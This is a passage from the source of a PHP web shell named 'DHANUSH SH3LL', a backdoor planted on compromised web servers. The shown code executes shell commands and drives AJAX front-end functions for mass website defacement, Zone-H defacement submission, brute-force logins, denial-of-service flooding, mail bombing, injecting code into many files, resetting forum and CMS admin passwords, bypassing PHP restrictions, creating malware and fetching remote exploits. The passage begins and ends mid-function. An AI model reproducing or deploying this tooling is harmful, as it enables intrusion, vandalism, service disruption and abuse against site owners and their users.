6365 $pieces = explode(".",$filename);
6366 $zip->extractTo($pieces[0]);
6367 $zip->close();
6368 echo '<BR><font class=txt size=3>File '.$v.' Unzipped successfully</font>';
6369 } else
6370 echo "<br><font size=3>Error: Unable to Unzip file $v</font>";
6371 }
6372 }
6373 echo '<BR><BR>';
6374 }
6375}
6376else if(isset($_GET['sitename']))
6377{
6378 $sitename = str_replace("http://","",$_GET['sitename']);
6379 $sitename = str_replace("http://www.","",$sitename);
6380 $sitename = str_replace("www.","",$sitename);
6381 $show = myexe("ls -la /etc/valiases/".$sitename);
6382 if(!empty($show))
6383 echo $show;
6384 else
6385 echo "Cannot get the username";
6386}
6387else if(isset($_GET['mydata']))
6388{
6389 listdatabase();
6390}
6391else if(isset($_GET['home']))
6392{
6393 mainfun($_GET['home']);
6394}
6395else if(isset($_GET['dir']))
6396{
6397 mainfun($_GET['myfilepath']);
6398}
6399else if(isset($_GET['mydirpath']))
6400{
6401 echo is_writable($_GET['mydirpath'])?"<font class=txt>< writable ></font>":"< not writable >";
6402}
6403else
6404{
6405?>
6406<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
6407<title>DHANUSH SH3LL</title>
6408<script type="text/javascript">
6409checked = false;
6410var waitstate = "<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
6411function checkedAll ()
6412{
6413 if (checked == false){checked = true}else{checked = false}
6414 for (var i = 0; i < document.getElementById('myform').elements.length; i++)
6415 {
6416 document.getElementById('myform').elements[i].checked = checked;
6417 }
6418}
6419function change_style(mystyle)
6420{
6421 window.location.href = '<?php echo $self; ?>?style='+mystyle;
6422}
6423function createsubdomain(cpaneluser,cpanelpass,noofsubdomain,subindex)
6424{
6425 var params = "cpaneluser="+cpaneluser+"&cpanelpass="+cpanelpass+"&noofsubdomain="+noofsubdomain+"&subindex="+subindex;
6426 document.getElementById("showmydata").innerHTML=waitstate;
6427 var ajaxRequest;
6428 ajaxRequest = new XMLHttpRequest();
6429
6430 ajaxRequest.onreadystatechange = function()
6431 {
6432 if(ajaxRequest.readyState == 3)
6433 {
6434 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6435 }
6436 }
6437
6438 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6439 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6440 ajaxRequest.send(params);
6441}
6442function massdeface(script,masswpdef,wpsym)
6443{
6444 var params = "massscript="+script+"&massdef="+masswpdef+"&wpsym="+wpsym;
6445 document.getElementById("showdef").innerHTML="<center><marquee scrollamount=4 width=150>It may take long time. Wait....</marquee></center>";
6446 var ajaxRequest;
6447 ajaxRequest = new XMLHttpRequest();
6448
6449 ajaxRequest.onreadystatechange = function()
6450 {
6451 if(ajaxRequest.readyState == 3)
6452 {
6453 document.getElementById("showdef").innerHTML=ajaxRequest.responseText;
6454 }
6455 }
6456
6457 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6458 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6459 ajaxRequest.send(params);
6460}
6461function urlchange(myfilepath)
6462{
6463 var mypath, mpath, i, t, j, r = "",myurl = "",splitter="";
6464 splitter = "<?php echo addslashes($directorysperator); ?>";
6465 mypath = mpath = myfilepath.split(splitter);
6466 <?php if($os == "Linux") { ?>
6467 r = "/";
6468 myurl = "<a href=javascript:void(0) onClick=\"changedir('dir','/')\">/</a>";
6469 <?php } ?>
6470 for (i = 0; i < mypath.length; i++)
6471 {
6472 if(mypath[i] == "")
6473 continue;
6474 r += mypath[i]+"<?php echo addslashes($directorysperator); ?>";
6475
6476 myurl += "<a href=javascript:void(0) onClick=\"changedir('dir','"+r+"\')\"><b>"+mypath[i]+"<?php echo addslashes($directorysperator); ?></b></a>";
6477 }
6478 myurl = myurl.replace(/\\/g,"\\\\");
6479 return myurl;
6480}
6481function wrtblDIR(mydirpath)
6482{
6483 var ajaxRequest;
6484 ajaxRequest = new XMLHttpRequest();
6485
6486 ajaxRequest.onreadystatechange = function()
6487 {
6488 if(ajaxRequest.readyState == 4)
6489 {
6490 for(i=0;i<=3;i++)
6491 document.getElementsByName("wrtble")[i].innerHTML=ajaxRequest.responseText;
6492 }
6493 }
6494
6495 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydirpath="+mydirpath, true);
6496 ajaxRequest.send(null);
6497}
6498function setpath(myfilpath)
6499{
6500 wrtblDIR(myfilpath);
6501 document.getElementById("path").value=myfilpath;
6502 document.getElementById("createfile").value=myfilpath;
6503 document.getElementById("readfile").value=myfilpath;
6504 document.getElementById("readdir").value=myfilpath;
6505 document.getElementById("createfolder").value=myfilpath;
6506 document.getElementById("createfolder").value=myfilpath;
6507 document.getElementById("exepath").value=myfilpath;
6508 document.getElementById("auexepath").value=myfilpath;
6509 document.getElementById("showdir").innerHTML="";
6510}
6511function changedir(myaction,myfilepath)
6512{
6513 var myurl = urlchange(myfilepath);
6514
6515 document.getElementById("showmaindata").innerHTML=waitstate;
6516 var ajaxRequest;
6517 ajaxRequest = new XMLHttpRequest();
6518
6519 ajaxRequest.onreadystatechange = function()
6520 {
6521 if(ajaxRequest.readyState == 4)
6522 {
6523 setpath(myfilepath);
6524 document.getElementById("crdir").innerHTML=myurl;
6525 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6526 }
6527 }
6528
6529 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
6530 ajaxRequest.send(null);
6531}
6532function gethome(myaction,mydir)
6533{
6534 var myurl = urlchange(mydir);
6535 document.getElementById("showmaindata").innerHTML=waitstate;
6536 var ajaxRequest;
6537 ajaxRequest = new XMLHttpRequest();
6538
6539 ajaxRequest.onreadystatechange = function()
6540 {
6541 if(ajaxRequest.readyState == 4)
6542 {
6543 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6544 setpath(mydir);
6545 document.getElementById("crdir").innerHTML=myurl;
6546 }
6547 }
6548
6549 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+mydir, true);
6550 ajaxRequest.send(null);
6551}
6552function getname(sitename)
6553{
6554 document.getElementById("showsite").innerHTML=waitstate;
6555 var ajaxRequest;
6556 ajaxRequest = new XMLHttpRequest();
6557
6558 ajaxRequest.onreadystatechange = function()
6559 {
6560 if(ajaxRequest.readyState == 4)
6561 {
6562 document.getElementById("showsite").innerHTML=ajaxRequest.responseText;
6563 }
6564 }
6565
6566 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?sitename="+sitename, true);
6567 ajaxRequest.send(null);
6568}
6569function myaction(myfileaction,chmode)
6570{
6571 var mytype = document.getElementsByName('actbox[]');
6572 var mychoice = new Array();
6573
6574 for (var i = 0, length = mytype.length; i < length; i++)
6575 {
6576 if (mytype[i].checked)
6577 mychoice[i] = mytype[i].value;
6578 }
6579
6580 var params = "choice="+myfileaction+"&chmode="+chmode+"&actbox[]="+mychoice;
6581
6582 document.getElementById("showmydata").className = "fixedbox";
6583 document.getElementById("showmydata").innerHTML=waitstate;
6584 var ajaxRequest;
6585 ajaxRequest = new XMLHttpRequest();
6586
6587 ajaxRequest.onreadystatechange = function()
6588 {
6589 if(ajaxRequest.readyState == 4)
6590 {
6591 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6592 }
6593 }
6594
6595 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6596 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6597 ajaxRequest.send(params);
6598}
6599function editdata()
6600{
6601 var result = "", // initialize list
6602 i,dbname,tablename;
6603 // iterate through arguments
6604 for (i = 1; i < arguments.length; i++)
6605 {
6606 if(i%2 == 0)
6607 result += arguments[i]+'=';
6608 else
6609 result += arguments[i]+'&';
6610 }
6611 result = result.slice(0, -1);
6612
6613 dbname = arguments[3];
6614 tablename = arguments[5];
6615 var result=result.replace(/dhanush_/g,"");
6616 var params = arguments[0]+"="+result;
6617
6618 document.getElementById("showsql").innerHTML=waitstate;
6619 var ajaxRequest;
6620 ajaxRequest = new XMLHttpRequest();
6621
6622 ajaxRequest.onreadystatechange = function()
6623 {
6624 if(ajaxRequest.readyState == 4)
6625 {
6626 viewtables('listTables',dbname,tablename);
6627 }
6628 }
6629
6630 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6631 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6632 ajaxRequest.send(params);
6633}
6634function viewtables(action,dbname,tablename,rowid,arrdata,executequery,fieldname,page)
6635{
6636 document.getElementById("showsql").innerHTML=waitstate;
6637 var ajaxRequest;
6638 ajaxRequest = new XMLHttpRequest();
6639
6640 ajaxRequest.onreadystatechange = function()
6641 {
6642 if(ajaxRequest.readyState == 4)
6643 {
6644 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
6645 }
6646 }
6647
6648 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?action="+action+"&dbname="+dbname+"&tablename="+tablename+"&"+rowid+"="+arrdata+"&executemyquery="+executequery+"&fieldname="+fieldname+"&page="+page, true);
6649 ajaxRequest.send(null);
6650}
6651function mydatabase(server,username,password)
6652{
6653 document.getElementById("showsql").innerHTML=waitstate;
6654 var ajaxRequest;
6655 ajaxRequest = new XMLHttpRequest();
6656
6657 ajaxRequest.onreadystatechange = function()
6658 {
6659 if(ajaxRequest.readyState == 4)
6660 {
6661 mydatago();
6662 }
6663 }
6664
6665 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executeit&server="+server+"&username="+username+"&password="+password, true);
6666 ajaxRequest.send(null);
6667}
6668function mydatago()
6669{
6670 var ajaxRequest;
6671 ajaxRequest = new XMLHttpRequest();
6672
6673 ajaxRequest.onreadystatechange = function()
6674 {
6675 if(ajaxRequest.readyState == 4)
6676 {
6677 document.getElementById("datatable").style.display = 'none';
6678 document.getElementById("showsql").innerHTML=ajaxRequest.responseText;
6679 }
6680 }
6681
6682 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?mydata", true);
6683 ajaxRequest.send(null);
6684}
6685function bruteforce(prototype,serverport,login,dict)
6686{
6687 var mytype = document.getElementsByName('mytype');
6688 for (var i = 0, length = mytype.length; i < length; i++)
6689 {
6690 if (mytype[i].checked)
6691 break;
6692 }
6693 var getreverse = 0;
6694 if(document.getElementById('reverse').checked == true)
6695 getreverse = 1;
6696 else
6697 getreverse = 0;
6698
6699 document.getElementById("showbrute").innerHTML=waitstate;
6700 var ajaxRequest;
6701 ajaxRequest = new XMLHttpRequest();
6702
6703 ajaxRequest.onreadystatechange = function()
6704 {
6705 if(ajaxRequest.readyState == 4)
6706 {
6707 document.getElementById("showbrute").innerHTML=ajaxRequest.responseText;
6708 }
6709 }
6710
6711 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?prototype="+prototype+"&serverport="+serverport+"&login="+login+"&dict="+dict+"&type="+mytype[i].value+"&reverse="+getreverse, true);
6712 ajaxRequest.send(null);
6713}
6714function executemyfile(action,executepath,execute)
6715{
6716 document.getElementById("showmydata").className = "fixedbox";
6717 document.getElementById("showmydata").innerHTML=waitstate;
6718 var ajaxRequest;
6719 ajaxRequest = new XMLHttpRequest();
6720
6721 ajaxRequest.onreadystatechange = function()
6722 {
6723 if(ajaxRequest.readyState == 4)
6724 {
6725 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6726 }
6727 }
6728
6729 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+action+"&executepath="+executepath+"&execute="+execute, true);
6730 ajaxRequest.send(null);
6731}
6732function maindata(myaction,dir)
6733{
6734 document.getElementById("showmaindata").innerHTML=waitstate;
6735 var ajaxRequest;
6736 ajaxRequest = new XMLHttpRequest();
6737
6738 ajaxRequest.onreadystatechange = function()
6739 {
6740 if(ajaxRequest.readyState == 4)
6741 {
6742 document.getElementById("showmaindata").innerHTML=ajaxRequest.responseText;
6743 document.getElementById("showdir").innerHTML="";
6744 }
6745 }
6746
6747 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"="+myaction+"&dir="+dir, true);
6748 ajaxRequest.send(null);
6749}
6750function manuallyscriptfn(sctype,passwd)
6751{
6752 var message = encodeURIComponent(passwd);
6753 var params = sctype+"="+sctype+"&passwd="+passwd;
6754 document.getElementById("showdata").innerHTML=waitstate;
6755 var ajaxRequest;
6756 ajaxRequest = new XMLHttpRequest();
6757
6758 ajaxRequest.onreadystatechange = function()
6759 {
6760 if(ajaxRequest.readyState == 3)
6761 {
6762 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
6763 }
6764 }
6765
6766 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6767 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6768 ajaxRequest.send(params);
6769}
6770function my404page(message)
6771{
6772 var message = encodeURIComponent(message);
6773 var params = "404page=404page&message="+message;
6774 document.getElementById("showdata").innerHTML=waitstate;
6775 var ajaxRequest;
6776 ajaxRequest = new XMLHttpRequest();
6777
6778 ajaxRequest.onreadystatechange = function()
6779 {
6780 if(ajaxRequest.readyState == 4)
6781 {
6782 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
6783 }
6784 }
6785
6786 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6787 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6788 ajaxRequest.send(params);
6789}
6790function executemyfn(executepath,executemycmd)
6791{
6792 var ajaxRequest,app;
6793 ajaxRequest = new XMLHttpRequest();
6794
6795 ajaxRequest.onreadystatechange = function()
6796 {
6797 if(ajaxRequest.readyState == 4)
6798 {
6799 app = "$ " + executemycmd + " : " + ajaxRequest.responseText + "\n";
6800 document.getElementById("showexecute").innerHTML=app+document.getElementById("showexecute").innerHTML;
6801 }
6802 }
6803
6804 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?executepath="+executepath+"&executemycmd="+executemycmd, true);
6805 ajaxRequest.send(null);
6806}
6807function zoneh(defacer,hackmode,reason,domain)
6808{
6809 var domain = encodeURIComponent(domain);
6810 var params = "SendNowToZoneH=SendNowToZoneH&defacer="+defacer+"&hackmode="+hackmode+"&reason="+reason+"&domain="+domain;
6811 document.getElementById("showzone").innerHTML=waitstate;
6812 var ajaxRequest;
6813 ajaxRequest = new XMLHttpRequest();
6814
6815 ajaxRequest.onreadystatechange = function()
6816 {
6817 if(ajaxRequest.readyState == 4)
6818 {
6819 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
6820 }
6821 }
6822
6823 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6824 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6825 ajaxRequest.send(params);
6826}
6827function savemyfile(file,content)
6828{
6829 var content = encodeURIComponent(content);
6830 var params = "content="+content+"&file="+file;
6831 document.getElementById("showmydata").innerHTML=waitstate;
6832 document.getElementById("showdir").innerHTML="";
6833 var ajaxRequest;
6834 ajaxRequest = new XMLHttpRequest();
6835
6836 ajaxRequest.onreadystatechange = function()
6837 {
6838 if(ajaxRequest.readyState == 4)
6839 {
6840 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6841 }
6842 }
6843
6844 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6845 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6846 ajaxRequest.send(params);
6847}
6848function renamefun(file,to)
6849{
6850 document.getElementById("showmydata").innerHTML=waitstate;
6851 var ajaxRequest;
6852 ajaxRequest = new XMLHttpRequest();
6853
6854 ajaxRequest.onreadystatechange = function()
6855 {
6856 if(ajaxRequest.readyState == 4)
6857 {
6858 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6859 }
6860 }
6861
6862 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
6863 ajaxRequest.send(null);
6864}
6865function changeperms(chmode,myfilename)
6866{
6867 document.getElementById("showmydata").innerHTML=waitstate;
6868 var ajaxRequest;
6869 ajaxRequest = new XMLHttpRequest();
6870
6871 ajaxRequest.onreadystatechange = function()
6872 {
6873 if(ajaxRequest.readyState == 4)
6874 {
6875 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6876 }
6877 }
6878
6879 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
6880 ajaxRequest.send(null);
6881}
6882function defacefun(deface)
6883{
6884 var ajaxRequest;
6885 ajaxRequest = new XMLHttpRequest();
6886
6887 ajaxRequest.onreadystatechange = function()
6888 {
6889 if(ajaxRequest.readyState == 4)
6890 {
6891 alert(ajaxRequest.responseText);
6892 }
6893 }
6894
6895 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
6896 ajaxRequest.send(null);
6897}
6898function cancel()
6899{
6900 document.getElementById("showmydata").className = "";
6901 document.getElementById("showmydata").innerHTML='';
6902}
6903function fileaction(myaction,myfilepath)
6904{
6905 document.getElementById("showmydata").className = "fixedbox";
6906 document.getElementById("showmydata").innerHTML=waitstate;
6907 var ajaxRequest;
6908 ajaxRequest = new XMLHttpRequest();
6909
6910 ajaxRequest.onreadystatechange = function()
6911 {
6912 if(ajaxRequest.readyState == 4)
6913 {
6914 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6915 }
6916 }
6917
6918 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
6919 ajaxRequest.send(null);
6920}
6921function bypassfun(funct,functvalue,optiontype)
6922{
6923 document.getElementById("showmydata").className = "fixedbox";
6924 document.getElementById("showmydata").innerHTML=waitstate;
6925 var ajaxRequest;
6926 ajaxRequest = new XMLHttpRequest();
6927 ajaxRequest.onreadystatechange = function()
6928 {
6929 if(ajaxRequest.readyState == 4)
6930 {
6931 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6932 }
6933 }
6934
6935 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
6936 ajaxRequest.send(null);
6937}
6938function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
6939{
6940 document.getElementById("showdos").innerHTML=waitstate;
6941 var ajaxRequest;
6942 ajaxRequest = new XMLHttpRequest();
6943
6944 ajaxRequest.onreadystatechange = function()
6945 {
6946 if(ajaxRequest.readyState == 4)
6947 {
6948 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
6949 }
6950 }
6951
6952 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&multiplier="+multiplier+"&no0fBytes="+no0fBytes, true);
6953 ajaxRequest.send(null);
6954}
6955function createfile(filecreator,filecontent)
6956{
6957 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
6958 var filecontent = encodeURIComponent(filecontent);
6959 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
6960 document.getElementById("showdir").innerHTML=waitstate;
6961 var ajaxRequest;
6962 ajaxRequest = new XMLHttpRequest();
6963
6964 ajaxRequest.onreadystatechange = function()
6965 {
6966 if(ajaxRequest.readyState == 4)
6967 {
6968 gethome('home',mm);
6969 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
6970 document.getElementById("showmydata").innerHTML="";
6971 }
6972 }
6973
6974 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6975 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6976 ajaxRequest.send(params);
6977}
6978function createdir(create,createfolder)
6979{
6980 document.getElementById("showmydata").className = "fixedbox";
6981 document.getElementById("showmydata").innerHTML=waitstate;
6982 var ajaxRequest;
6983 ajaxRequest = new XMLHttpRequest();
6984
6985 ajaxRequest.onreadystatechange = function()
6986 {
6987 if(ajaxRequest.readyState == 4)
6988 {
6989 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6990 }
6991 }
6992
6993 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
6994 ajaxRequest.send(null);
6995}
6996function codeinsert(code)
6997{
6998 var code = encodeURIComponent(code);
6999 var params = "getcode="+code;
7000 document.getElementById("showcode").innerHTML=waitstate;
7001 var ajaxRequest;
7002
7003 ajaxRequest = new XMLHttpRequest();
7004
7005 ajaxRequest.onreadystatechange = function()
7006 {
7007 if(ajaxRequest.readyState == 4)
7008 {
7009 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
7010 }
7011 }
7012
7013 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7014 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7015 ajaxRequest.send(params);
7016}
7017function getmydefacedata(mydata)
7018{
7019 document.getElementById("showmydeface").innerHTML=waitstate;
7020 var ajaxRequest;
7021 ajaxRequest = new XMLHttpRequest();
7022
7023 ajaxRequest.onreadystatechange = function()
7024 {
7025 if(ajaxRequest.readyState == 4)
7026 {
7027 document.getElementById("showmydeface").innerHTML=ajaxRequest.responseText;
7028 }
7029 }
7030
7031 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
7032 ajaxRequest.send(null);
7033}
7034function getmydata(mydata)
7035{
7036 document.getElementById("showmydata").className = "fixedbox";
7037 document.getElementById("showmydata").innerHTML=waitstate;
7038 var ajaxRequest;
7039 ajaxRequest = new XMLHttpRequest();
7040
7041 ajaxRequest.onreadystatechange = function()
7042 {
7043 if(ajaxRequest.readyState == 4)
7044 {
7045 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
7046 }
7047 }
7048
7049 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
7050 ajaxRequest.send(null);
7051}
7052function getdata(mydata,myfile)
7053{
7054 document.getElementById("showdata").innerHTML=waitstate;
7055 var ajaxRequest;
7056 ajaxRequest = new XMLHttpRequest();
7057
7058 ajaxRequest.onreadystatechange = function()
7059 {
7060 if(ajaxRequest.readyState == 3)
7061 {
7062 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
7063 }
7064 }
7065
7066 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
7067 ajaxRequest.send(null);
7068}
7069function getport(host,protocol,start,end)
7070{
7071 document.getElementById("showports").innerHTML=waitstate;
7072 var ajaxRequest;
7073 ajaxRequest = new XMLHttpRequest();
7074
7075 ajaxRequest.onreadystatechange = function()
7076 {
7077 if(ajaxRequest.readyState == 4)
7078 {
7079 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
7080 }
7081 }
7082
7083 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
7084 ajaxRequest.send(null);
7085}
7086function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uname,newpass)
7087{
7088 document.getElementById("showchangepass").innerHTML=waitstate;
7089 var ajaxRequest;
7090 ajaxRequest = new XMLHttpRequest();
7091
7092 ajaxRequest.onreadystatechange = function()
7093 {
7094 if(ajaxRequest.readyState == 4)
7095 {
7096 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
7097 }
7098 }
7099
7100 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uname=" + uname + "&newpass=" + newpass, true);
7101 ajaxRequest.send(null);
7102}
7103function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,f5)
7104{
7105 var index = encodeURIComponent(index);
7106 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&f5="+f5;
7107 document.getElementById("showdeface").innerHTML=waitstate;
7108 var ajaxRequest;
7109 ajaxRequest = new XMLHttpRequest();
7110
7111 ajaxRequest.onreadystatechange = function()
7112 {
7113 if(ajaxRequest.readyState == 4)
7114 {
7115 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
7116 }
7117 }
7118
7119 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7120 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7121 ajaxRequest.send(params);
7122}
7123function codeinjector(pathtomass,mode,filetype,injectthis)
7124{
7125 var injectthis = encodeURIComponent(injectthis);
7126 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
7127 document.getElementById("showinject").innerHTML=waitstate;
7128 var ajaxRequest;
7129 ajaxRequest = new XMLHttpRequest();
7130
7131 ajaxRequest.onreadystatechange = function()
7132 {
7133 if(ajaxRequest.readyState == 3)
7134 {
7135 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
7136 }
7137 }
7138
7139 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7140 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7141 ajaxRequest.send(params);
7142}
7143function sendmail(mailfunction,to,subject,message,from,times,padding)
7144{
7145 var message = encodeURIComponent(message);
7146 if(mailfunction == "massmailing")
7147 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
7148 else if(mailfunction == "dobombing")
7149 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
7150 document.getElementById("showmail").innerHTML=waitstate;
7151 var ajaxRequest;
7152 ajaxRequest = new XMLHttpRequest();
7153
7154 ajaxRequest.onreadystatechange = function()
7155 {
7156 if(ajaxRequest.readyState == 4)
7157 {
7158 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
7159 }
7160 }
7161
7162 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7163 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7164 ajaxRequest.send(params);
7165}
7166function execode(code)
7167{
7168 var intext = document.getElementById('intext').checked;
7169 var message = encodeURIComponent(message);
7170 var params = "code="+code+"&intext="+intext;
7171 document.getElementById("showresult").innerHTML=waitstate;
7172 var ajaxRequest;
7173 ajaxRequest = new XMLHttpRequest();
7174
7175 ajaxRequest.onreadystatechange = function()
7176 {
7177 if(ajaxRequest.readyState == 4)
7178 {
7179 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
7180 }
7181 }
7182
7183 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
7184 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
7185 ajaxRequest.send(params);
7186}
7187function malwarefun(malwork)
7188{
7189 var malpath = document.getElementById('createfile').value;
7190 document.getElementById("showmal").innerHTML="<center><marquee scrollamount=4 width=150>Wait....</marquee></center>";
7191 var ajaxRequest;
7192 ajaxRequest = new XMLHttpRequest();
7193
7194 ajaxRequest.onreadystatechange = function()
7195 {
7196 if(ajaxRequest.readyState == 4)
7197 {
7198 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
7199 }
7200 }
7201
7202 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
7203 ajaxRequest.send(null);
7204}
7205function getexploit(wurl,path,functiontype)
7206{
7207 document.getElementById("showexp").innerHTML=waitstate;
7208 var ajaxRequest;
7209 ajaxRequest = new XMLHttpRequest();
7210
7211 ajaxRequest.onreadystatechange = function()
7212 {
7213 if(ajaxRequest.readyState == 4)
7214 {
7215 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
7216 }
7217 }
7218
7219 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
7220 ajaxRequest.send(null);
7221}
7222function showMsg(msg)
7223{
7224 if(msg == 'smf')
7225 {
7226 document.getElementById('tableprefix').value="smf_";
7227 document.getElementById('fid').style.display='block';
7228 document.getElementById('wpress').style.display='none';
7229 document.getElementById('joomla').style.display='none';
7230 }
7231 if(msg == 'mybb')
7232 {
7233 document.getElementById('tableprefix').value="mybb_";
7234 document.getElementById('wpress').style.display='none';
7235 document.getElementById('joomla').style.display='none';
7236 document.getElementById('fid').style.display='block';
7237 }
7238 if(msg == 'ipb' || msg == 'vb')
7239 {
7240 document.getElementById('tableprefix').value="";
7241 document.getElementById('wpress').style.display='none';
7242 document.getElementById('joomla').style.display='none';
7243 document.getElementById('fid').style.display='block';
7244 }
7245 if(msg == 'wp')
7246 {
7247 document.getElementById('tableprefix').value="wp_";
7248 document.getElementById('wpress').style.display='block';
